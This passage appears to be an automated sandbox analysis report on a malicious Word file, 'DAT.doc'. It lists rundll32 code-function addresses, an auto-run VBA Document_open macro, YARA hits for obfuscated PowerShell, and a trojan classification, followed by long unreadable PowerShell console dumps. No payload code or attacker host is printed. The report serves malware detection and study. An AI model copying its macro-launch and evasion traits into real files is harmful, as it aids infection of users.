Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00301E7D	11_2_00301E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F367A	11_2_002F367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00306E50	11_2_00306E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003112B6	11_2_003112B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003002A0	11_2_003002A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5EBA	11_2_002F5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F06B6	11_2_002F06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003066AE	11_2_003066AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F628A	11_2_002F628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6EE4	11_2_002F6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00308EE2	11_2_00308EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003096EA	11_2_003096EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FC6CE	11_2_002FC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003006D1	11_2_003006D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00306AD5	11_2_00306AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FD2C9	11_2_002FD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FAF28	11_2_002FAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030473C	11_2_0030473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00307713	11_2_00307713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FFB05	11_2_002FFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FEF04	11_2_002FEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8B16	11_2_002F8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FD760	11_2_002FD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00304F60	11_2_00304F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1B46	11_2_002F1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5742	11_2_002F5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FCF5B	11_2_002FCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00302B45	11_2_00302B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00304B48	11_2_00304B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8355	11_2_002F8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030BFB0	11_2_0030BFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5BAC	11_2_002F5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F33AB	11_2_002F33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FA7A2	11_2_002FA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FF3B5	11_2_002FF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FE380	11_2_002FE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2F97	11_2_002F2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00309BE4	11_2_00309BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FABF8	11_2_002FABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F27F4	11_2_002F27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F77F0	11_2_002F77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FB7C2	11_2_002FB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6C05	12_2_004A6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6E8A	12_2_004A6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5748	12_2_004B5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AE360	12_2_004AE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AFB04	12_2_004AFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A9716	12_2_004A9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A4121	12_2_004A4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B533C	12_2_004B533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BA7E4	12_2_004BA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A83F0	12_2_004A83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BC19B	12_2_004BC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B4DAD	12_2_004B4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A884A	12_2_004A884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AD04B	12_2_004AD04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B7A50	12_2_004B7A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AD668	12_2_004AD668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A766F	12_2_004A766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5060	12_2_004B5060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B0C65	12_2_004B0C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A427A	12_2_004A427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B1C79	12_2_004B1C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B8E79	12_2_004B8E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B2A7D	12_2_004B2A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AF471	12_2_004AF471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A1600	12_2_004A1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B3600	12_2_004B3600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A3618	12_2_004A3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A4828	12_2_004A4828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B68CB	12_2_004B68CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004ADEC9	12_2_004ADEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AD2CE	12_2_004AD2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B12D1	12_2_004B12D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B76D5	12_2_004B76D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BA2EA	12_2_004BA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B9AE2	12_2_004B9AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB0E1	12_2_004AB0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A7AE4	12_2_004A7AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BD08F	12_2_004BD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AF099	12_2_004AF099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BA094	12_2_004BA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B72AE	12_2_004B72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B0EA0	12_2_004B0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AC8A5	12_2_004AC8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6ABA	12_2_004A6ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A12B6	12_2_004A12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6342	12_2_004A6342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A2746	12_2_004A2746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B3745	12_2_004B3745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004ADB5B	12_2_004ADB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BC95E	12_2_004BC95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A4D5F	12_2_004A4D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A8F55	12_2_004A8F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5B60	12_2_004B5B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B8978	12_2_004B8978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A5D0E	12_2_004A5D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B0705	12_2_004B0705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B8313	12_2_004B8313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B2513	12_2_004B2513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004ABB28	12_2_004ABB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A792C	12_2_004A792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AE924	12_2_004AE924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5D36	12_2_004B5D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AC3C2	12_2_004AC3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B39E1	12_2_004B39E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB7F8	12_2_004AB7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A33F4	12_2_004A33F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AEF80	12_2_004AEF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BB19F	12_2_004BB19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A3B97	12_2_004A3B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A8994	12_2_004A8994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A3FAB	12_2_004A3FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A67AC	12_2_004A67AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB3A2	12_2_004AB3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A81A0	12_2_004A81A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A59B8	12_2_004A59B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BCBB0	12_2_004BCBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AFFB5	12_2_004AFFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6005	13_2_001B6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B3C28	13_2_001B3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC44B	13_2_001BC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B7C4A	13_2_001B7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1079	13_2_001C1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE871	13_2_001BE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C0065	13_2_001C0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4460	13_2_001C4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE499	13_2_001BE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C9494	13_2_001C9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CC48F	13_2_001CC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BBCA5	13_2_001BBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C5CCB	13_2_001C5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BA4E1	13_2_001BA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1913	13_2_001C1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B510E	13_2_001B510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C5136	13_2_001C5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6D2C	13_2_001B6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B3521	13_2_001B3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BDD24	13_2_001BDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CBD5E	13_2_001CBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B415F	13_2_001B415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C7D78	13_2_001C7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CA59F	13_2_001CA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CB59B	13_2_001CB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B7D94	13_2_001B7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B4DB8	13_2_001B4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C41AD	13_2_001C41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B75A0	13_2_001B75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2DE1	13_2_001C2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B2A18	13_2_001B2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B0A00	13_2_001B0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2A00	13_2_001C2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1600	13_2_001D1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6E50	13_2_001C6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B367A	13_2_001B367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1E7D	13_2_001C1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8279	13_2_001C8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCA68	13_2_001BCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6A6F	13_2_001B6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B628A	13_2_001B628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5EBA	13_2_001B5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D12B6	13_2_001D12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B06B6	13_2_001B06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C66AE	13_2_001C66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C02A0	13_2_001C02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AD5	13_2_001C6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C06D1	13_2_001C06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD2C9	13_2_001BD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC6CE	13_2_001BC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C96EA	13_2_001C96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8EE2	13_2_001C8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6EE4	13_2_001B6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8B16	13_2_001B8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C7713	13_2_001C7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BFB05	13_2_001BFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BEF04	13_2_001BEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C473C	13_2_001C473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BAF28	13_2_001BAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCF5B	13_2_001BCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8355	13_2_001B8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4B48	13_2_001C4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5742	13_2_001B5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2B45	13_2_001C2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B1B46	13_2_001B1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD760	13_2_001BD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4F60	13_2_001C4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B2F97	13_2_001B2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE380	13_2_001BE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CBFB0	13_2_001CBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BF3B5	13_2_001BF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B33AB	13_2_001B33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5BAC	13_2_001B5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BA7A2	13_2_001BA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BB7C2	13_2_001BB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BABF8	13_2_001BABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B77F0	13_2_001B77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B27F4	13_2_001B27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C9BE4	13_2_001C9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6C05	14_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6E8A	14_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C9716	14_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CFB04	14_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D533C	14_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C4121	14_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D5748	14_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CE360	14_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DC19B	14_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D4DAD	14_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C83F0	14_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DA7E4	14_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C3618	14_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C1600	14_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D3600	14_2_001D3600

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: DAT.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module T6dwlv_ivpoiq2, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: DAT.doc

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000E380 appears 41 times

Yara signature match

Source: 00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Lyeta6ud.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995406845869

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@36/9@2/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00206686 CreateToolhelp32Snapshot,

20_2_00206686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$DAT.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp

Jump to behavior

Source: DAT.doc

OLE indicator, Word Document stream: true

Source: DAT.doc	OLE document summary: title field not present or empty
Source: DAT.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... ...............................h...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...0...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......x._.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F......................p.j......................X.............}..v.....`......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................p.j..... X...............X.............}..v....8a......0...............x._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j......................X.............}..v.....m......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j....X._...............X.............}..v.....n......0................._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j......................X.............}..v....8.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j..... X...............X.............}..v............0...............(._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F_.....(.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....P.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.5.............}..v............0................F_.....$.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
